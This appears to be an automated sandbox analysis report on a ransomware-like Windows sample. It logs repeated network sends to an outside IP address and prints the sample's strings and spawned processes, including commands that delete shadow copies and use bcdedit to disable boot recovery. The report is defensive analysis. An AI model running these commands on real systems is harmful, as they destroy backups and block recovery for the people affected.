Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeFile created: C:\Users\admin\AppData\Roaming\amhfnhe45.exe
May use bcdedit to modify the Windows boot settings
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: bcdedit.exe /set {current} optionsedit off
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: bcdedit.exe /set {current} recoveryenabled off
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: bcdedit.exe /set {current} advancedoptions off
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: bcdedit.exe /set {current} bootems off
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: fwindir%s\system32\cmd.exe/c start "" ""runasvssadmin.exe delete shadows /all /Quiet openrunas234058000Shell32.dllKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\recover_file_.txt:Zone.IdentifierSeDebugPrivilege12393578327533451bcdedit.exe /set {current} bootems offbcdedit.exe /set {current} advancedoptions offbcdedit.exe /set {current} optionsedit offbcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailuresbcdedit.exe /set {current} recoveryenabled offw+%s
Source: amhfnhe45.exeBinary or memory string: bcdedit.exe /set {current} optionsedit off
Source: amhfnhe45.exeBinary or memory string: bcdedit.exe /set {current} recoveryenabled off
Source: amhfnhe45.exeBinary or memory string: bcdedit.exe /set {current} advancedoptions off
Source: amhfnhe45.exeBinary or memory string: bcdedit.exe /set {current} bootems off
Source: amhfnhe45.exeBinary or memory string: bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
Source: amhfnhe45.exeBinary or memory string: fwindir%s\system32\cmd.exe/c start "" ""runasvssadmin.exe delete shadows /all /Quiet openrunas234058000Shell32.dllKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\recover_file_.txt:Zone.IdentifierSeDebugPrivilege12393578327533451bcdedit.exe /set {current} bootems offbcdedit.exe /set {current} advancedoptions offbcdedit.exe /set {current} optionsedit offbcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailuresbcdedit.exe /set {current} recoveryenabled offw+%s
Source: amhfnhe45.exeBinary or memory string: \#bcdedit.exe
Source: bcdedit.exeBinary or memory string: bcdedit.exe /set {current} bootems off
Source: bcdedit.exeBinary or memory string: C:\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {current} bootems offC:\Windows\system32\bcdedit.exeWinsta0\Default3
Source: bcdedit.exeBinary or memory string: bcdedit.exe /set {current} bootems off4
Source: bcdedit.exeBinary or memory string: ^,\Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##0
Source: bcdedit.exeBinary or memory string: >C:\Windows\system32\bcdedit.exe
Source: bcdedit.exeBinary or memory string: bcdedit.exe
Source: bcdedit.exeBinary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exeBinary or memory string: bcdedit.exe/set{current}bootemsoffnLOCALAPPDATA=C:\Users\admin\AppData\LocalLOGONSERVER=\\ADMIN-PCNUMBER_OF_PROCEh
Source: bcdedit.exeBinary or memory string: =bcdedit.exe/set{current}advancedoptionsoff:\Users\admin\AppData\LocalLOGONSERVER=\\ADMIN-PCNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:\PrZlx)
Source: bcdedit.exeBinary or memory string: bcdedit.exe /set {current} advancedoptions off
Source: bcdedit.exeBinary or memory string: C:\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {current} advancedoptions offC:\Windows\system32\bcdedit.exeWinsta0\Default
Source: bcdedit.exeBinary or memory string: bcdedit.exe /set {current} advancedoptions offx
Source: bcdedit.exeBinary or memory string: \Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: bcdedit.exeBinary or memory string: >C:\Windows\system32\bcdedit.exe
Source: bcdedit.exeBinary or memory string: bcdedit.exe
Source: bcdedit.exeBinary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exeBinary or memory string: >C:\Windows\system32\bcdedit.exe
Source: bcdedit.exeBinary or memory string: bcdedit.exe
Source: bcdedit.exeBinary or memory string: bcdedit.exe/set{current}optionseditoffPPDATA=C:\Users\admin\AppData\LocalLOGONSERVER=\\ADMIN-PCNUMBER_OF_PROCESSORS=1OS=Windo*
Source: bcdedit.exeBinary or memory string: bcdedit.exe /set {current} optionsedit off
Source: bcdedit.exeBinary or memory string: C:\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {current} optionsedit offC:\Windows\system32\bcdedit.exeWinsta0\Default
Source: bcdedit.exeBinary or memory string: \Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: bcdedit.exeBinary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exeBinary or memory string: bcdedit.exe/set{current}bootstatuspolicyIgnoreAllFailuresGONSERVER=\\ADMIN-PCNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Wi
Source: bcdedit.exeBinary or memory string: bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
Source: bcdedit.exeBinary or memory string: C:\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailuresC:\Windows\system32\bcdedit.exeWinsta0\Default
Source: bcdedit.exeBinary or memory string: ^C\Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: bcdedit.exeBinary or memory string: >C:\Windows\system32\bcdedit.exe
Source: bcdedit.exeBinary or memory string: bcdedit.exe
Source: bcdedit.exeBinary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exeBinary or memory string: bcdedit.exe /set {current} recoveryenabled off
Source: bcdedit.exeBinary or memory string: C:\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {current} recoveryenabled offC:\Windows\system32\bcdedit.exeWinsta0\DefaulteBP
Source: bcdedit.exeBinary or memory string: bcdedit.exe /set {current} recoveryenabled offbBP
Source: bcdedit.exeBinary or memory string: \Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: bcdedit.exeBinary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exeBinary or memory string: >C:\Windows\system32\bcdedit.exe
Source: bcdedit.exeBinary or memory string: bcdedit.exe
Source: bcdedit.exeBinary or memory string: bcdedit.exe/set{current}recoveryenabledoff:\Users\admin\AppData\LocalLOGONSERVER=\\ADMIN-PCNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:\Pr
Uses bcdedit to modify the Windows boot settings
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootems off
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} advancedoptions off
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} optionsedit off
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} recoveryenabled off

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_0042D4E5 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0042D4E5
Generates new code (likely due to unpacking of malware or shellcode)
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode execution: Found new code
